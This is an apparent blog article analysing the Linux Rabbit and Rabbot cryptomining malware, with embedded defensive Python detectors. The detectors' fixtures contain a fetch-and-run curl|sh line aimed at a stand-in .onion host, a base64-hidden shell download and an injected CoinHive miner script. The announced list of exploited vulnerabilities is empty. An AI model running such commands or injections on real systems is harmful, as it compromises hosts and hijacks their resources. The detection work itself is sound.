Rabbit's running Rabbot

Toby Arnett
January 19, 2019

             The future of technology is tied to IoT devices, and many business systems have come to rely on Linux. Linux is an open-source operating system that can be built into a robust platform for high-end servers or trimmed down to a low-resource system for devices such as thermostats, garage door openers, smart lights and many other IoT devices. The Raspberry Pi and various other single-board systems also use Linux variants as their primary operating system.

 

             While Linux systems are attacked by viruses and malware far less often than Windows, they still have their vulnerabilities. According to AV-Test, of roughly 76,000 samples collected in 2016, only 412 were Linux malware. That does not mean Linux systems are free from attack: as more devices become network-connected, more vulnerabilities present themselves to attackers.

 

 

             This was the case for a recent malware campaign that targeted Linux servers in Russia, the US, the UK and South Korea as a first strike, followed by a second, global campaign. The campaign, which began in August of 2018, was identified by Anomali Labs. It targeted Linux servers and Internet of Things (IoT) devices using two strains of malware that share a code base, Linux Rabbit and “Rabbot”, and its purpose was to install cryptocurrency miners on the compromised devices. The malware relied on several capabilities in this attack:

 

  • The ability to establish a connection with its C2 server through Tor gateways.

  • The ability to gain persistence on the targeted device.

  • The ability to brute-force SSH passwords to gain access to the server.

  • The ability to install the version of the cryptocurrency miner appropriate for the server.
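As an added illustration of the SSH brute-force step above (example code written for this page, not code from the malware or from the Anomali report), the following Python script runs the detection logic a defender would want over a handful of constructed auth.log lines: it counts failed password attempts per source IP inside a sliding time window and escalates the finding when a password login from the same IP succeeds afterwards, which is the moment the miner would get installed. The log lines, the host name and the IP addresses are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt for the example (not a real incident); the host
# name and the IP addresses (RFC 5737 documentation ranges) are made up.
SAMPLE_AUTH_LOG = """\
Aug 21 10:01:02 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51122 ssh2
Aug 21 10:01:03 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51123 ssh2
Aug 21 10:01:04 web1 sshd[2102]: Failed password for invalid user admin from 203.0.113.7 port 51124 ssh2
Aug 21 10:01:05 web1 sshd[2103]: Failed password for invalid user pi from 203.0.113.7 port 51125 ssh2
Aug 21 10:01:06 web1 sshd[2104]: Failed password for root from 203.0.113.7 port 51126 ssh2
Aug 21 10:01:07 web1 sshd[2105]: Failed password for root from 203.0.113.7 port 51127 ssh2
Aug 21 10:01:09 web1 sshd[2106]: Accepted password for root from 203.0.113.7 port 51128 ssh2
Aug 21 10:05:00 web1 sshd[2200]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Aug 21 10:06:00 web1 sshd[2201]: Accepted publickey for alice from 198.51.100.4 port 40001 ssh2
"""

# One OpenSSH authentication line in the traditional syslog format.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2018):
    """Yield (timestamp, result, method, user, ip) for each sshd auth line.

    syslog timestamps carry no year, so the caller supplies one.
    """
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["method"], m["user"], m["ip"]


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window.

    Returns {ip: {"level": "bruteforce" | "compromised",
                  "users": set of user names tried,
                  "account": user whose password login later succeeded, or None}}.
    A password login that succeeds after the threshold was crossed is the
    signal that matters most: that is the point at which a miner gets installed.
    """
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    tried = defaultdict(set)     # ip -> user names attempted
    report = {}
    for ts, result, method, user, ip in parse_events(text):
        if result == "Failed":
            tried[ip].add(user)
            window = recent[ip]
            window.append(ts)
            while ts - window[0] > timedelta(seconds=window_seconds):
                window.pop(0)           # expire failures older than the window
            if len(window) >= threshold and ip not in report:
                report[ip] = {"level": "bruteforce", "users": tried[ip], "account": None}
        elif result == "Accepted" and method == "password" and ip in report:
            report[ip]["level"] = "compromised"
            report[ip]["account"] = user
    return report


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {finding['level']} (tried {sorted(finding['users'])}, "
              f"password login succeeded for {finding['account']})")
```

On a real host the input is /var/log/auth.log (or the sshd unit in journalctl); the key-based login from the second address is deliberately left unflagged, because the lasting fix for this attack is exactly that: set `PasswordAuthentication no` and `PermitRootLogin no` in sshd_config so a dictionary attack has nothing to guess.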

 

             The malware used the “rc.local” and “.bashrc” files to keep a persistent connection to its command and control (C&C) server. Both files are executed by the operating system: /etc/rc.local runs at the end of the boot process and is traditionally used by system administrators for site-specific commands that do not warrant a full start/stop script under /etc/init.d, while a user’s .bashrc runs every time that user opens an interactive Bash shell. A command placed in either file therefore relaunches the malware after a reboot or a login. If the connection succeeded, the malware then attempted to install its payloads: the CNRig and CoinHive Monero miners.
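To show what the persistence mechanism looks like from the defender’s side, here is an added Python check, written for this page and not code from the malware or from Anomali, that scans the contents of an rc.local or .bashrc file for the traits described above: references to Tor hidden services or tor2web-style gateways, downloads piped straight into a shell, base64-wrapped commands (which it decodes and rescans), known miner names, and detached background processes. The sample file contents and the .onion hostname are constructed for the example, and the gateway suffixes are a few well-known tor2web ones rather than an exhaustive list.

```python
import base64
import re

# Constructed sample files for the example. The fourth line of each is the kind
# of entry this malware family leaves behind; the .onion name is made up.
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# rc.local: executed at the end of each multiuser runlevel
/usr/local/bin/start-sensor-daemon
nohup sh -c 'curl -s http://abcdefghijklmnop.onion.to/rabbit.sh | sh' >/dev/null 2>&1 &
exit 0
"""

HIDDEN_CMD = "curl http://abcdefghijklmnop.onion/cnrig | sh"   # hypothetical payload
SAMPLE_BASHRC = (
    "# ~/.bashrc\n"
    "alias ll='ls -alF'\n"
    'export PATH="$HOME/bin:$PATH"\n'
    f"echo {base64.b64encode(HIDDEN_CMD.encode()).decode()} | base64 -d | bash\n"
)

# Indicator patterns and the reason reported when one fires.
INDICATORS = [
    (re.compile(r"\.onion\b|onion\.(?:to|link|ws)\b|tor2web", re.I),
     "Tor hidden service or tor2web gateway reference"),
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
     "download piped straight into a shell"),
    (re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"),
     "base64-decoded payload piped into a shell"),
    (re.compile(r"\b(?:cnrig|xmrig|minerd)\b", re.I),
     "known Monero miner name"),
    (re.compile(r"\bnohup\b.*&\s*$"),
     "detached background process launched at boot/login"),
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decoded_blobs(line):
    """Yield the UTF-8 text of any base64-looking token on the line."""
    for tok in B64_TOKEN.findall(line):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue          # not base64, or not text: ignore it


def _reasons(text):
    return [why for rx, why in INDICATORS if rx.search(text)]


def scan_startup_script(text):
    """Return [(line_number, [reasons])] for suspicious non-comment lines."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = _reasons(line)
        for blob in _decoded_blobs(line):
            reasons += [f"{why} (inside base64 blob)" for why in _reasons(blob)]
        if reasons:
            findings.append((lineno, reasons))
    return findings


if __name__ == "__main__":
    for name, content in (("/etc/rc.local", SAMPLE_RC_LOCAL), ("~/.bashrc", SAMPLE_BASHRC)):
        for lineno, reasons in scan_startup_script(content):
            print(f"{name}:{lineno}: " + "; ".join(reasons))
```

In practice this is run over /etc/rc.local and every user’s .bashrc (root’s included), and the decoded-blob step matters because the one-liner that survives in these files is usually wrapped in base64 precisely so that a casual grep for curl or .onion finds nothing.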

 

             Once the session was established, the C&C server geolocated the victim’s source IP address to decide whether the host was on the permitted list or on the “blacklist”. The approved countries in the first campaign were Russia, South Korea, the UK and the US. The malware also checked the machine’s hostname: it took the top-level domain (TLD) of the hostname and, if that TLD belonged to a blacklisted country, the script stopped. A TLD is the highest level of the DNS hierarchy beneath the root zone, the last label of a domain name: in test.com the TLD is .com, test.com is a second-level domain registered under it, and sat.test.com is a subdomain of test.com. Country-code TLDs such as .uk or .kr are the ones that map to a country, which is what made this hostname check possible.

             The “Rabbot” strain targeted many different IoT devices, attempting to exploit known vulnerabilities in misconfigured programs and services or in unpatched devices. This was the second stage of the campaign, a global event with no blacklisted countries. There are several key differences between Linux Rabbit and Rabbot:

 

  • Rabbot is capable of targeting IoT devices as well as Linux servers.

  • Rabbot was designed to install CoinHive miners into the web pages on an infected web server, by injecting malicious JavaScript code into the pages the server serves.

  • Rabbot is not geographically restricted, unlike Linux Rabbit which was designed to only operate in specific countries.
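Rabbot’s web-server payload leaves a recognisable trace in the pages it serves. The Python scanner below is an added example written for this page (not Rabbot’s code or Anomali’s), run over a constructed two-file web root: it parses each HTML document, reports script tags whose src points at a CoinHive host, and pulls the site key out of inline `new CoinHive.Anonymous('...')` calls, since that key is the indicator to pivot on across other infected servers. The paths, page contents and site key are made up.

```python
import re
from html.parser import HTMLParser

# Constructed in-memory web root for the example: one clean page and one page
# carrying the kind of injected miner described above. Paths and the site key
# are made up.
SAMPLE_WEB_ROOT = {
    "/var/www/html/about.html": (
        "<html><body><p>About us</p>"
        "<script>console.log('ok');</script></body></html>"
    ),
    "/var/www/html/index.html": """<!doctype html>
<html><head><title>Shop</title>
<script src="/js/app.js"></script>
</head><body><h1>Welcome</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('HYPOTHETICALSITEKEY0000000000000', {throttle: 0.5});
  miner.start();
</script>
</body></html>""",
}

# Hosts the CoinHive loader was served from, and the inline constructor call
# whose first argument is the attacker's site key.
MINER_HOST = re.compile(r"^(?:https?:)?//(?:[\w-]+\.)*(?:coinhive|coin-hive|authedmine)\.com/", re.I)
SITE_KEY = re.compile(r"new\s+CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]+)['\"]")


class MinerScanner(HTMLParser):
    """Collect external miner loaders and inline miner site keys from one page."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self.in_script = True
        src = dict(attrs).get("src") or ""
        if MINER_HOST.match(src):
            self.findings.append({"kind": "external", "src": src, "site_key": None})

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self.in_script:
            for m in SITE_KEY.finditer(data):
                self.findings.append({"kind": "inline", "src": None, "site_key": m.group(1)})


def scan_web_root(files):
    """files: {path: html}. Returns a list of findings, each tagged with its path."""
    results = []
    for path in sorted(files):
        parser = MinerScanner()
        parser.feed(files[path])
        parser.close()
        results.extend({"path": path, **f} for f in parser.findings)
    return results


if __name__ == "__main__":
    for f in scan_web_root(SAMPLE_WEB_ROOT):
        print(f"{f['path']}: {f['kind']} miner, src={f['src']}, site_key={f['site_key']}")
```

Walking the document root with os.walk and feeding each .html or .php file into scan_web_root gives the on-disk view; fetching the same URLs over HTTP and scanning the responses catches the case where the injection lives in the server configuration or a shared template rather than in the files themselves.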

 

The known vulnerabilities that Rabbot is capable of exploiting include the following:

 

 

             The malware’s ultimate design was to set up as many cryptocurrency miners as possible worldwide, across a wide variety of device types. It shows that the threat will continue to grow as more devices become network-connected, and that a thorough review of network and system security is required so that a smart device controlling the lighting or the thermostat does not become the overlooked weak link.